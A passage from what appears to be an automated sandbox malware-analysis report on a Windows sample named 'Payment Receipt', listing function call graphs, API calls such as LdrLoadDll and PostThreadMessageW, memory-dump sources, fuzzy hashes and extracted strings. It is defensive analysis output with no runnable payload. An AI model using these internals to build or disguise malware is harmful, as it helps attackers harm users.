748b13 92467->92494 92470 75cf1d 92469->92470 92471 75cf2a ExitProcess 92470->92471 92471->92445 92473 746970 92472->92473 92475 746989 92473->92475 92476 75d583 92473->92476 92475->92453 92478 75d59d 92476->92478 92477 75d5cc 92477->92475 92478->92477 92479 75c193 LdrInitializeThunk 92478->92479 92480 75d62c 92479->92480 92481 75ec03 RtlFreeHeap 92480->92481 92482 75d645 92481->92482 92482->92475 92484 74b5b9 92483->92484 92485 74b4dd 92483->92485 92484->92458 92484->92459 92489 75c233 92485->92489 92488 75cb43 NtClose 92488->92484 92490 75c250 92489->92490 92493 15e35c0 LdrInitializeThunk 92490->92493 92491 74b5ad 92491->92488 92493->92491 92496 748b3d 92494->92496 92495 74903b 92495->92466 92496->92495 92502 744173 92496->92502 92498 748c6a 92498->92495 92499 75ec03 RtlFreeHeap 92498->92499 92500 748c82 92499->92500 92500->92495 92501 75cf03 ExitProcess 92500->92501 92501->92495 92506 744193 92502->92506 92504 7441fc 92504->92498 92505 7441f2 92505->92498 92506->92504 92507 74b8e3 RtlFreeHeap LdrInitializeThunk 92506->92507 92507->92505 92508 74402f 92509 743fa6 92508->92509 92509->92508 92510 743fb5 92509->92510 92512 75cdd3 92509->92512 92513 75cdf0 92512->92513 92516 15e2c70 LdrInitializeThunk 92513->92516 92514 75ce18 92514->92510 92516->92514 92517 15e2b60 LdrInitializeThunk

                                                                      Executed Functions

                                                                      Function 00748B13 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 748b13-748b4a call 75eca3 49 748b55-748b87 call 75eca3 call 734b43 call 7547b3 46->49 50 748b50 call 75eca3 46->50 57 749046-74904a 49->57 58 748b8d-748bb7 call 75ec53 49->58 50->49 61 748bc2 58->61 62 748bb9-748bc0 58->62 63 748bc4-748bce 61->63 62->63 64 748bd0 63->64 65 748bef-748c01 call 7547e3 63->65 66 748bd3-748bd6 64->66 72 749044-749045 65->72 73 748c07-748c1f call 75e603 65->73 68 748bdf-748be9 66->68 69 748bd8-748bdb 66->69 68->65 69->66 71 748bdd 69->71 71->65 72->57 73->72 76 748c25-748c75 call 744173 73->76 76->72 79 748c7b-748c9b call 75ec03 76->79 82 748ccc-748cce 79->82 83 748c9d-748c9f 79->83 84 748cd7-748cf9 call 74b673 82->84 86 748cd0 82->86 83->84 85 748ca1-748caf call 75e173 call 7370c3 83->85 84->72 92 748cff-748d21 call 75c363 84->92 93 748cb4-748cb9 85->93 86->84 96 748d26-748d2b 92->96 93->82 95 748cbb-748cca 93->95 97 748d31-748da7 call 75bd03 call 75bdb3 call 75ec53 95->97 96->72 96->97 104 748db0 97->104 105 748da9-748dae 97->105 106 748db2-748de2 104->106 105->106 107 748ebe 106->107 108 748de8-748dee 106->108 111 748ec0 107->111 109 748df0-748df3 108->109 110 748dfc-748e1d call 75ec53 108->110 109->108 112 748df5-748df7 109->112 118 748e1f-748e27 110->118 119 748e29 110->119 113 748ec7-748ecb 111->113 112->111 115 748ed1-748ed5 113->115 116 748ecd-748ecf 113->116 115->113 116->115 120 748ed7-748eeb 116->120 121 748e2c-748e41 118->121 119->121 122 748f55-748fa8 call 747c23 * 2 call 75ec23 120->122 123 748eed-748ef2 120->123 124 748e54-748e95 call 747ba3 call 75ec53 121->124 125 748e43 121->125 154 748fcd-748fd2 122->154 155 748faa-748fae 122->155 127 748ef4-748ef7 123->127 151 748e97-748e9c 124->151 152 748e9e 124->152 128 748e46-748e49 125->128 131 748f0e-748f10 127->131 132 748ef9-748efc 127->132 133 748e52 128->133 134 748e4b-748e4e 128->134 131->127 138 748f12-748f14 131->138 132->131 137 748efe-748f00 132->137 133->124 134->128 139 748e50 134->139 137->131 142 748f02-748f05 137->142 138->122 143 748f16-748f1e 138->143 139->124 142->131 147 748f07 142->147 144 748f23-748f26 143->144 148 748f4f-748f53 144->148 149 748f28-748f2b 144->149 147->131 148->122 148->144 149->148 153 748f2d-748f2f 149->153 156 748ea0-748ebc call 7450a3 151->156 152->156 153->148 160 748f31-748f34 153->160 158 748fd4 154->158 159 748fda-748fec call 75bf13 154->159 155->159 161 748fb0-748fc1 call 737133 155->161 156->111 158->159 168 748ff3-749008 call 74b843 159->168 160->148 164 748f36-748f4c 160->164 166 748fc6-748fcb 161->166 164->148 166->154 166->168 171 74900a-749036 call 747ba3 * 2 call 75cf03 168->171 177 74903b-74903e 171->177 177->72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$"
                                                                      • API String ID: 0-3758156766
                                                                      • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                      • Instruction ID: 8fb57fc146de677679978b383bd173cb6978cd77af40a3578885d5b7776ef693
                                                                      • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                      • Instruction Fuzzy Hash: 8DF173B1D0021AEFDB64DB64CC85BEEB7B9EF44300F1481A9E909A7241DB749E45CFA1
                                                                      Function 00731B8B Relevance: 2.9, Strings: 2, Instructions: 360COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 178 731b8b-731b8c 179 731bb6-731bcb 178->179 180 731b8e-731b95 178->180 184 731bcc-731be4 179->184 182 731b97-731b9f 180->182 183 731bf9-731c00 180->183 192 731b31 182->192 193 731ba1-731ba2 182->193 185 731c32 183->185 186 731c02-731c31 183->186 184->183 187 731c33-731c4b 185->187 186->187 190 731c4e-731c54 187->190 191 731c4d 187->191 190->187 196 731c56-731c5b 190->196 191->190 194 731b33-731b45 192->194 195 731b1c 192->195 193->184 197 731ba4-731bb3 193->197 201 731b49-731b83 194->201 198 731aae-731ac1 195->198 199 731b1e-731b1f 195->199 200 731c60-731c73 196->200 197->179 202 731ac5 198->202 199->201 203 731b21-731b30 199->203 200->200 204 731c75-731c7d 200->204 213 731b84-731b89 201->213 207 731a87-731a94 202->207 208 731ac6-731ae3 202->208 203->192 205 731c84 204->205 206 731c7f-731c83 204->206 210 731c86 205->210 211 731c89-731c8f 205->211 206->205 212 731a77-731a80 207->212 208->202 214 731ae5-731aea 208->214 210->211 211->204 215 731c91-731ca8 call 731170 211->215 219 731a82-731a83 212->219 220 731a6b-731a74 212->220 213->178 218 731b1b 213->218 216 731af4-731b07 214->216 217 731aec 214->217 227 731cb0-731cc3 215->227 216->213 226 731b09-731b0d 216->226 221 731a84-731a85 217->221 223 731aee-731af0 217->223 218->195 219->221 220->212 221->207 223->216 226->218 227->227 228 731cc5 227->228 229 731cc7-731cdf 228->229 230 731ce2-731ce8 229->230 231 731ce1 229->231 230->229 232 731cea-731cef 230->232 231->230 233 731cf0-731d03 232->233 233->233 234 731d05 233->234 235 731d07-731d1f 234->235 236 731d22-731d28 235->236 237 731d21 235->237 236->235 238 731d2a-731d58 call 731ed0 236->238 237->236 241 731d60-731d71 238->241 241->241 242 731d73-731d7f call 731000 241->242 244 731d84-731d8a call 760173 242->244 245 731d8c-731d99 244->245 246 731da0-731db1 245->246 246->246 247 731db3-731dca 246->247 248 731dd0-731dd9 247->248 248->248 249 731ddb-731de3 248->249
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfff$qi
                                                                      • API String ID: 0-3408824469
                                                                      • Opcode ID: dcc0bf84a9ad56e6a8ded503bd64d953e62c35cd92d8c3081e2c5e698a1b5e61
                                                                      • Instruction ID: fe7b2c70e491682227880093397f1b090013a6556ac14333a754cfb9d16ac526
                                                                      • Opcode Fuzzy Hash: dcc0bf84a9ad56e6a8ded503bd64d953e62c35cd92d8c3081e2c5e698a1b5e61
                                                                      • Instruction Fuzzy Hash: A0B102727443164FE71ACA2CCC926E8BB56EB56324F5C52BEC852CF2D3F215891287C0
                                                                      Function 00747CA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 279 747ca3-747ccc call 75f7e3 282 747cd2-747ce0 call 75fde3 279->282 283 747cce-747cd1 279->283 286 747cf0-747d01 call 75e283 282->286 287 747ce2-747ced call 760083 282->287 292 747d03-747d17 LdrLoadDll 286->292 293 747d1a-747d1d 286->293 287->286 292->293
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00747D15
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                      • Instruction ID: b47a9e12cacc3a73ee7c9b04847446167488831fbd2a52af7d8946e8ef29841f
                                                                      • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                      • Instruction Fuzzy Hash: 7D015EB1E4020DABDF14DBA0CC96FDEB778AB54304F0041A5EE0897240F674EB18CBA1
                                                                      Function 0075CB43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 299 75cb43-75cb7f call 734903 call 75dd73 NtClose
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0075CB7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                      • Instruction ID: 8206bf336f7c7effdd23d73d6f88341eceae3c3021d7da0bf0a6d0d6c5cd360b
                                                                      • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                      • Instruction Fuzzy Hash: 01E04672200244BBE220EA59DC06F9BB76CEFC5710F008555FA58A7242C6B0B91587E1
                                                                      Function 015E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 313 15e2b60-15e2b6c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d1bb6a1c62360998ff2eedc19a6f85f9b9c9e4172c0911ef26eb7fbe8610ff72
                                                                      • Instruction ID: d569c51058d2ecf3e29643ff625d57e2e3441e78020c9d2aae99f8ab471d03e0
                                                                      • Opcode Fuzzy Hash: d1bb6a1c62360998ff2eedc19a6f85f9b9c9e4172c0911ef26eb7fbe8610ff72
                                                                      • Instruction Fuzzy Hash: 2C90026120240003450571584414616404AE7E1211B59C425E2414990DC665C9A56225
                                                                      Function 015E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: efb4a6bc95a297836f6fdb6fabc0d37667fee6a7593bdab116ce7f6aa1d14ae7
                                                                      • Instruction ID: ece4a825972cd39c39a6e94d1a7c764132b1db88d7506ed9f10b1d064ea22799
                                                                      • Opcode Fuzzy Hash: efb4a6bc95a297836f6fdb6fabc0d37667fee6a7593bdab116ce7f6aa1d14ae7
                                                                      • Instruction Fuzzy Hash: 2A90023120140413D511715845047070049E7D1251F99C816A1824958DD796CA66A221
                                                                      Function 015E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 314 15e2c70-15e2c7c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 2065394cf928cf7415f4b01ea8a3877ef8c8d20b93835d61c8f0268b9b81fd9d
                                                                      • Instruction ID: 4148e3c0adba99ffc56f1c333c8b480ed35d19aec21455f542ce30763c25dd75
                                                                      • Opcode Fuzzy Hash: 2065394cf928cf7415f4b01ea8a3877ef8c8d20b93835d61c8f0268b9b81fd9d
                                                                      • Instruction Fuzzy Hash: 6990023120148802D5107158840474A0045E7D1311F5DC815A5824A58DC7D5C9A57221
                                                                      Function 015E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fb79abdbd9e8c61ea391d7ecb107ccf0383d324d4f6be24883cb545f6f4bcb5e
                                                                      • Instruction ID: e97fababe3f5696cfe48f370160cb99c6d255d5d0369453bd3315ef42bbd5ce5
                                                                      • Opcode Fuzzy Hash: fb79abdbd9e8c61ea391d7ecb107ccf0383d324d4f6be24883cb545f6f4bcb5e
                                                                      • Instruction Fuzzy Hash: BE90023160550402D500715845147061045E7D1211F69C815A1824968DC7D5CA6566A2
                                                                      Function 00731BEB Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfff
                                                                      • API String ID: 0-1553575800
                                                                      • Opcode ID: 286f2aa4c7b4f9cd331c25ee6937dff4f5ae17abf8fc72ce496cee5881d3f2cf
                                                                      • Instruction ID: bf645291f6911b18ea005a9dc2b914bb5380230ab92bdbc9f040a4a66b38135d
                                                                      • Opcode Fuzzy Hash: 286f2aa4c7b4f9cd331c25ee6937dff4f5ae17abf8fc72ce496cee5881d3f2cf
                                                                      • Instruction Fuzzy Hash: C65199B2F501190BEB1C891CCC926B8B75AEBD4304F98627EED06DF3C3E5299E104690
                                                                      Function 007444C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0074456A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 17O3k-2I$17O3k-2I
                                                                      • API String ID: 1836367815-2455829943
                                                                      • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                      • Instruction ID: 0e9f8675e5cc2b06e7cbb81886c49b5e5d912aac2f650e56c273d7e3ef4f2db7
                                                                      • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                      • Instruction Fuzzy Hash: C91127B2D44148BADB10DBE08C81EEEBF7CEF40354F0440A9F954AB102D77C8E468BA0
                                                                      Function 007444F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0074456A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 17O3k-2I$17O3k-2I
                                                                      • API String ID: 1836367815-2455829943
                                                                      • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                      • Instruction ID: 84e8af699bf8c552b687942b6df8f98b0286b854f633d3b2e8405b01bd1130c3
                                                                      • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                      • Instruction Fuzzy Hash: 2A019BB1D0014CBADB10ABE58C81DEF7B7CEF41794F048065FA1467141D6689E068BB1
                                                                      Function 0075CEB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 75ceb3-75cef4 call 734903 call 75dd73 RtlFreeHeap
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0075CEEF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: it
                                                                      • API String ID: 3298025750-124186967
                                                                      • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                      • Instruction ID: ef5de24cb1e818b76bceff041f790c5ba7fc3916c2a1c45e62a2d63b1356f8d5
                                                                      • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                      • Instruction Fuzzy Hash: 2BE06DB1604204BBD624EE58EC45FDB37ACEFC8710F004009F918A7242C7B1BD118BB5
                                                                      Function 0075CE63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 294 75ce63-75cea7 call 734903 call 75dd73 RtlAllocateHeap
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,0074EA4E,?,?,00000000,?,0074EA4E,?,?,?), ref: 0075CEA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                      • Instruction ID: ca0733b8fd5b9f29cfbda94f8669a840363cd3db0167f0dd69f43562d01d33ec
                                                                      • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                      • Instruction Fuzzy Hash: C6E06DB2214344BBD624EE58DC46FAB77ACEF88710F004049FA08A7242C7B0BD1086B5
                                                                      Function 0075CF03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 304 75cf03-75cf38 call 734903 call 75dd73 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 0075CF33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                      • Associated: 00000000.00000002.2016384888.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_730000_Payment Receipt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                      • Instruction ID: 80de4306c47fb807c22253561ae215934627c8e6d4e42f7cc04ad75246c07cf5
                                                                      • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                                      • Instruction Fuzzy Hash: 42E08C32200614BBD220EA59DC05F9B77ACDFC5711F108096FE08A7286D6B4B9148BF5
                                                                      Function 015E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 309 15e2c0a-15e2c0f 310 15e2c1f-15e2c26 LdrInitializeThunk 309->310 311 15e2c11-15e2c18 309->311
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b3ed69e72735e8526f9528bac7897cf54025084d5e17d934d9388216d66b734
                                                                      • Instruction ID: 932965a108c9d8be306911566dc32ef95921709c4ffc900eafbba808685d1c03
                                                                      • Opcode Fuzzy Hash: 7b3ed69e72735e8526f9528bac7897cf54025084d5e17d934d9388216d66b734
                                                                      • Instruction Fuzzy Hash: 85B02B31C015C0C5DE01F360860C70B3940B7C0300F19C021D3030A41F4338C0E0E271

                                                                      Non-executed Functions

                                                                      Function 01622349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2160512332
                                                                      • Opcode ID: 77e68b103c96231b87f5e84bff1f8db5e2bf77184be205c06964e0695fa8045b
                                                                      • Instruction ID: fe97975145bed24bee48efd9915bee2253ff62bc66cb00512301847b3a636a50
                                                                      • Opcode Fuzzy Hash: 77e68b103c96231b87f5e84bff1f8db5e2bf77184be205c06964e0695fa8045b
                                                                      • Instruction Fuzzy Hash: 3A929D71A08B529FE721DE28CC90B6BB7E8BB88750F04491DFA949B350D774E844CF92
                                                                      Function 015968B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-3089669407
                                                                      • Opcode ID: 9c4f010f0e796491a512683145738d6f9642800e774fff35802d9347da9038d8
                                                                      • Instruction ID: ddf0cc041c963d0777d4844105f8664a8895ceb5d328ade07611faf09871b18b
                                                                      • Opcode Fuzzy Hash: 9c4f010f0e796491a512683145738d6f9642800e774fff35802d9347da9038d8
                                                                      • Instruction Fuzzy Hash: FF8144B2D1121A7F8B21EED4DDC5EEE77BEBB447547044426FA01FB110E620DE158BA1
                                                                      Function 01645910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • PreferredUILanguages, xrefs: 016463D1
                                                                      • @, xrefs: 016463A0
                                                                      • PreferredUILanguagesPending, xrefs: 016461D2
                                                                      • @, xrefs: 01646277
                                                                      • Control Panel\Desktop, xrefs: 0164615E
                                                                      • @, xrefs: 016461B0
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01645A84
                                                                      • @, xrefs: 01646027
                                                                      • InstallLanguageFallback, xrefs: 01646050
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164635D
                                                                      • @, xrefs: 0164647A
                                                                      • LanguageConfiguration, xrefs: 01646420
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01645FE1
                                                                      • LanguageConfigurationPending, xrefs: 01646221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
